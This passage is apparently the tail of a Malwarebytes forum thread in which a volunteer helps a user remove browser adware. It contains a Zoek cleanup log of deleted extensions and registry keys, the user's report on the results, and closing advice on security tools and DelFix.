PorIcEChop - Owner\AppData\Local\Torch\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Owner\AppData\Local\Torch\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

 

==== Chrome Fix ======================

 

C:\ProgramData\WRData\PKG\CHROME\CHROME_1.0.0.26.crx deleted successfully

C:\ProgramData\WRData\pkg\lpchrome.crx deleted successfully

C:\Users\Administrator\AppData\Local\Chromatic Browser\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj 

 

deleted successfully

C:\Users\Administrator\AppData\Local\Chromatic Browser\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee 

 

deleted successfully

C:\Users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted 

 

successfully

C:\Users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted 

 

successfully

C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted 

 

successfully

C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted 

 

successfully

C:\Users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj 

 

deleted successfully

C:\Users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee 

 

deleted successfully

C:\Users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted 

 

successfully

C:\Users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted 

 

successfully

C:\Users\Guest\AppData\Local\Chromatic Browser\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted 

 

successfully

C:\Users\Guest\AppData\Local\Chromatic Browser\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted 

 

successfully

C:\Users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted 

 

successfully

C:\Users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted 

 

successfully

C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted 

 

successfully

C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted 

 

successfully

C:\Users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted 

 

successfully

C:\Users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted 

 

successfully

C:\Users\Guest\AppData\Local\Torch\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted successfully

C:\Users\Guest\AppData\Local\Torch\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted successfully

C:\Users\Owner\AppData\Local\Chromatic Browser\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted 

 

successfully

C:\Users\Owner\AppData\Local\Chromatic Browser\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted 

 

successfully

C:\Users\Owner\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted 

 

successfully

C:\Users\Owner\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted 

 

successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted 

 

successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn deleted 

 

successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb deleted 

 

successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\dappigdjllcnkkoacaoolciaolaaiemb deleted 

 

successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\defekohaofmambflfpfoojkmfdpcbgko deleted 

 

successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejidjjhkpiempkbhmpbfngldlkglhimk deleted 

 

successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\fbangkleohkafngihneedemihgfeikcl deleted 

 

successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\fgbljhhdencbpamajdkebnaaefgllghj deleted 

 

successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom deleted 

 

successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\haebnnbpedcbhciplfhjjkbafijpncjl deleted 

 

successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd deleted 

 

successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted 

 

successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjeghcllfecehndceplomkocgfbklffd deleted 

 

successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\kodigjkcpaoeodlnmcnekemakpnmegnk deleted 

 

successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda deleted 

 

successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\okfhiodnpcnnnpgbjbhfebjnbagmfhab deleted 

 

successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia deleted 

 

successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pmejhjjecaldkllonlokhkglbdbkdcni deleted 

 

successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ponjkmladgjfjgllmhnkhgbgocdigcjm deleted 

 

successfully

C:\Users\Owner\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted 

 

successfully

C:\Users\Owner\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted 

 

successfully

C:\Users\Owner\AppData\Local\Torch\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted successfully

C:\Users\Owner\AppData\Local\Torch\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-devtools_devtools_0.localstorage 

 

deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-devtools_devtools_0.localstorage-

 

journal deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-

 

extension_banbpclkbhgajgppgifhdeemmielfjke_0.localstorage deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-

 

extension_banbpclkbhgajgppgifhdeemmielfjke_0.localstorage-journal deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-

 

extension_bepbmhgboaologfdajaanbcjmnhjmhfn_0.localstorage deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-

 

extension_bepbmhgboaologfdajaanbcjmnhjmhfn_0.localstorage-journal deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-

 

extension_cfhdojbkjhnklbpkdaibdccddilifddb_0.localstorage deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-

 

extension_cfhdojbkjhnklbpkdaibdccddilifddb_0.localstorage-journal deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-

 

extension_eemcgdkfndhakfknompkggombfjjjeno_0.localstorage deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-

 

extension_eemcgdkfndhakfknompkggombfjjjeno_0.localstorage-journal deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-

 

extension_gakbgbehpeeofmjippjanlhdfemdeppm_0.localstorage deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-

 

extension_gakbgbehpeeofmjippjanlhdfemdeppm_0.localstorage-journal deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-

 

extension_gighmmpiobklfepjocnamgkkbiglidom_0.localstorage deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-

 

extension_gighmmpiobklfepjocnamgkkbiglidom_0.localstorage-journal deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-

 

extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-

 

extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage-journal deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-

 

extension_pafkbggdmjlpgkdkcbjmhmfcdpncadgh_0.localstorage deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-

 

extension_pmejhjjecaldkllonlokhkglbdbkdcni_0.localstorage deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-

 

extension_pmejhjjecaldkllonlokhkglbdbkdcni_0.localstorage-journal deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-

 

extension_ponjkmladgjfjgllmhnkhgbgocdigcjm_0.localstorage deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-

 

extension_ponjkmladgjfjgllmhnkhgbgocdigcjm_0.localstorage-journal deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\databases\chrome-

 

extension_hdokiejnpimakedhajhdlcegeplioahd_0 deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\databases\chrome-

 

extension_okfhiodnpcnnnpgbjbhfebjnbagmfhab_0 deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pafkbggdmjlpgkdkcbjmhmfcdpncadgh 

 

deleted successfully

 

==== Set IE to Default ======================

 

Old Values:

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]

"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}] not found

 

New Values:

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]

"DefaultScope"="{012E1000-F331-11DB-8314-0800200C9A66}"

 

==== All HKCU SearchScopes ======================

 

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes

{012E1000-F331-11DB-8314-0800200C9A66} Google  Url="http://www.google.com/search?q={searchTerms}"

{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Bing  Url="http://www.bing.com/search?q={searchTerms}&src=IE-

 

SearchBox&FORM=IE8SRC"

 

==== Deleting CLSID Registry Keys ======================

 

HKEY_USERS\S-1-5-21-610162119-960651099-2309175161-1001\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{C55BBCD6-

 

41AD-48AD-9953-3609C48EACC7} deleted successfully

HKEY_USERS\S-1-5-21-610162119-960651099-2309175161-1001\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{C55BBCD6

 

-41AD-48AD-9953-3609C48EACC7} deleted successfully

HKEY_USERS\S-1-5-21-610162119-960651099-2309175161-1001\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{000123B4-

 

9B42-4900-B3F7-F4B073EFC214} deleted successfully

HKEY_USERS\S-1-5-21-610162119-960651099-2309175161-1001\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{000123B4

 

-9B42-4900-B3F7-F4B073EFC214} deleted successfully

HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{C55BBCD6-41AD-48AD-9953-3609C48EACC7} deleted successfully

HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{000123B4-9B42-4900-B3F7-F4B073EFC214} deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{000123B4-9B42-

 

4900-B3F7-F4B073EFC214} deleted successfully

 

==== Deleting CLSID Registry Values ======================

 

HKEY_USERS\S-1-5-21-610162119-960651099-2309175161-1001\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser

 

\{C55BBCD6-41AD-48AD-9953-3609C48EACC7} deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\{C55BBCD6-41AD-48AD-9953-3609C48EACC7} 

 

deleted successfully

HKEY_LOCAL_MACHINE\software\Wow6432Node\mozilla\Firefox\extensions\fmdownloader@gmail.com deleted successfully

HKEY_LOCAL_MACHINE\software\Wow6432Node\mozilla\Firefox\extensions\ytfmdownloader@gmail.com deleted successfully

 

==== Deleting Registry Keys ======================

 

HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\9810b679-6ac3-47d6-b7c4-35b83b0e4a3b 

 

deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Google\Chrome\Extensions\bhicbhhgmeobmgjehpcecbkjpehljipn deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Google\Chrome\Extensions\bpegkgagfojjbcpkihigfmkojdmmimdf deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Google\Chrome\Extensions\ehgldbbpchgpcfagfpfjgoomddhccfgh deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Google\Chrome\Extensions\jbolfgndggfhhpbnkgnpjkfhinclbigj deleted successfully

 

==== Empty IE Cache ======================

 

C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied 

 

successfully

C:\Users\Owner\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully

C:\Users\Owner\AppData\Local\Microsoft\Windows\INetCache\Low\Content.IE5 emptied successfully

C:\WINDOWS\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully

C:\WINDOWS\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully

C:\WINDOWS\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully

 

==== Empty FireFox Cache ======================

 

C:\Users\Owner\AppData\Local\Mozilla\Firefox\Profiles\kfjgpmg8.default\Cache emptied successfully

 

==== Empty Chrome Cache ======================

 

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Cache emptied successfully

 

==== Empty All Flash Cache ======================

 

Flash Cache Emptied Successfully

 

==== Empty All Java Cache ======================

 

Java Cache cleared successfully

 

==== C:\zoek_backup content ======================

 

C:\zoek_backup (files=2472 folders=501 68002642 bytes)

 

==== Empty Temp Folders ======================

 

C:\Users\Default\AppData\Local\Temp emptied successfully

C:\Users\Default User\AppData\Local\Temp emptied successfully

C:\Users\Owner\AppData\Local\Temp will be emptied at reboot

C:\WINDOWS\serviceprofiles\networkservice\AppData\Local\Temp emptied successfully

C:\WINDOWS\serviceprofiles\Localservice\AppData\Local\Temp emptied successfully

C:\WINDOWS\Temp will be emptied at reboot
Link to post
Share on other sites

ZoekexeQuarantineFileScreenshot_10729201

 

 

The problem occurred when I got ahead of the instructions and ran the zoek.exe file without disabling Webroot first, I apologize for my mistake.  However, despite my mistake, I am concerned that Webroot flagged Zoek.exe as a Trojan virus.  Because I believe that you are a trusted advisor and never had problems before on Malwarebytes.org, I went ahead and ran the Zoek.exe file anyway.  So far I have not done anything with the Quarantine items in Webroot.

 

I did notice that every single add on extension for Chrome was wiped out and replaced with a "puzzle piece picture" even though they are "Enabled" (they do not work)  I know not to install stuff during this process, however, my LastPass extension I depend on because I cannot remember 31 character string passwords with symbols etc.  So out of necessity to be able to log into Malwarebytes.org forums I did delete and reinstall the LastPass add on extension from the Chrome Store into Chrome.

 

Within Chrome I noticed the following:

 

ChromeApps_zps1986cb8e.jpg

 

All of my Chrome apps are replaced with that different picture.  I have tested a couple of them and the apps that I tested worked.  They do not have the specific app picture as I had before.

 

With all that in mind I did notice that the PorIcEChop & SavuEMass browser virus is gone in Chrome, Firefox and Internet Explorer for now.

 

What is the next step?

 

Thanks.  And by the way, I like your Avatar picture...lol. Cool!

 

- fryer

Link to post
Share on other sites

Also please forgive me for not paying more close attention to the instructions.  In the past I have always been asked to post the logs within the reply and that is that I "thought" I saw in your instructions.  However, I am wrong in my assumption.

 

In the future I will attach my logs as an attachment for you.

 

-fryer

Link to post
Share on other sites

Then we're done here ;)


 

Below you will find my thoughts about securing your machine. Go ahead through it, you will benefit from some useful advice about safe computing.
 
 

Recommended reading:

icon_exclaim.gifMUST READ - general maintenance: What to do if your Computer is running slowly?
 
 
 

Recommended additional software:

icon_arrow.gifTFC - to clean unneeded temporary files.
icon_arrow.gifMalwarebytes' Anti-Malware - to scan your system from time to time in search for malware.
icon_arrow.gifMalwarebytes' Anti-Exploit - to prevent plenty of mostly exploited vulnerabilities.
icon_arrow.gifMcShield - to prevent infections spread by removable media.
icon_arrow.gifCryptoPrevent - to secure yourself from very severe CryptoLocker infection.
icon_arrow.gifUnchecky - to prevent from installing additional foistware, implemented in legitimate installations.
 
 
The following will implement some post-cleanup procedures:
 
=> Please download DelFix by Xplode to your Desktop.
 
Run the tool and check the following boxes below;
checkmark.png Remove disinfection tools
checkmark.png Create registry backup
checkmark.png Purge System Restore
Click Run button and wait a few seconds for the programme completes his work.
At this point all the tools we used here should be gone. Tool will create an report for you (C:\DelFix.txt)
 
The tool will also record healthy state of registry and make a backup using ERUNT program in %windir%\ERUNT\DelFix
Tool deletes old system restore points and create a fresh system restore point after cleaning.
 
 

My help is free for everybody.

If you're happy with the help provided and/or wish to buy me a beer for the assistance you received, then you can consider a donation: btn_donate_SM.gif
Thank you!

 
 
 
Stay safe,
TwinHeadedEagle :)
Link to post
Share on other sites

  • Root Admin

Glad we could help. :)

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.